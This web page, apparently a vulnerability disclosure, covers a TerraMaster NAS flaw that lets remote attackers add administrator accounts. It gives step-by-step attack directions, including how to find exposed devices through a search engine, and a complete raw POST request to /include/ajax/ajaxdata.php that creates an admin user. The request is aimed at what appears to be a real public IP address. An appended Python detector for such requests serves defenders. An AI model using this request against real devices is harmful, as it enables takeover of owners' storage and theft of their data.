High-risk vulnerability in TerraMaster NAS network storage
TerraMaster is an international storage brand dedicated to providing professional private cloud storage devices for users worldwide. Its products include high-performance, secure, reliable, multi-functional, and environmentally friendly NAS network cloud storage servers and DAS direct-attached storage devices. TerraMaster has a high market share and a good reputation in the banking, insurance, school, small and medium-sized enterprise, and high-end household storage markets.
The TerraMaster system enables UPnP and Cloud services by default, so as long as the system is connected to the Internet, it can be accessed. Because some files lack strict permission verification, remote attackers can add management accounts at will. After logging on to the system, they may steal sensitive information belonging to users or enterprises.
TerraMaster private cloud storage NAS network storage system: adding a management user
Search for "TerraMaster System Management" through a search engine.
You can also enter an existing account name, such as admin, at http://www.terra-master.com/cloud/.
POST the following data:
POST /include/ajax/ajaxdata.php HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-US
Referer: http://1.1.1.1:8181/mod/3.UserManage/1.user.php
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 222.139.234.187:8181
Content-Length: 230
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=9cf3113aadad895b1bd9affa3ad6fd1d

handleprocess=adduser&username=admin1&pwd=admin1.2.3.&email=&phone=&quota=0&group=admin%2Callusers&fcreate=0&fname= &fhide=0&flock=0&fdisks=md0&folderids=16%2C15%2C14%2C13%2C12%2C3%2C2%2C1&rights=2%2C2%2C2%2C2%2C2%2C2%2C2%2C2
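For defenders, the request above gives a clear detection signature: a POST to /include/ajax/ajaxdata.php with handleprocess=adduser and a group list that includes admin. The following is an added example, not part of the original write-up or TerraMaster's code; the function names, the trusted_sources allowlist and the sample capture are assumptions, and the source address is expected to come from the proxy or IDS record that captured the request.

```python
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/include/ajax/ajaxdata.php"  # path from the request on this page

def parse_request(raw):
    """Split a raw HTTP request into (method, path, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    # keep_blank_values keeps empty fields such as email= visible
    fields = parse_qs(body.strip(), keep_blank_values=True)
    form = {name: values[0] for name, values in fields.items()}
    return parts[0].upper(), urlsplit(parts[1]).path, form

def account_creation_alert(raw, src_ip, trusted_sources=frozenset()):
    """Return an alert for an adduser request, or None if unrelated."""
    try:
        method, path, form = parse_request(raw)
    except ValueError:
        return None
    if method != "POST" or not path.endswith(ENDPOINT):
        return None
    if form.get("handleprocess") != "adduser":
        return None
    groups = [g for g in form.get("group", "").split(",") if g]
    grants_admin = "admin" in groups
    untrusted = src_ip not in trusted_sources
    return {
        "src_ip": src_ip,
        "username": form.get("username", ""),  # the password is never copied
        "groups": groups,
        "grants_admin": grants_admin,
        "severity": "high" if grants_admin and untrusted else "review",
    }

# Constructed sample capture (documentation addresses, not real traffic).
SAMPLE = (
    "POST /include/ajax/ajaxdata.php HTTP/1.1\r\n"
    "Host: 192.0.2.10:8181\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
    "handleprocess=adduser&username=newacct&pwd=x&email=&group=admin%2Callusers"
)

if __name__ == "__main__":
    print(account_creation_alert(SAMPLE, "203.0.113.7"))
```

Any "high" alert should be cross-checked against the NAS user list, since an account created this way persists after the request.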
Home users
Enterprise Users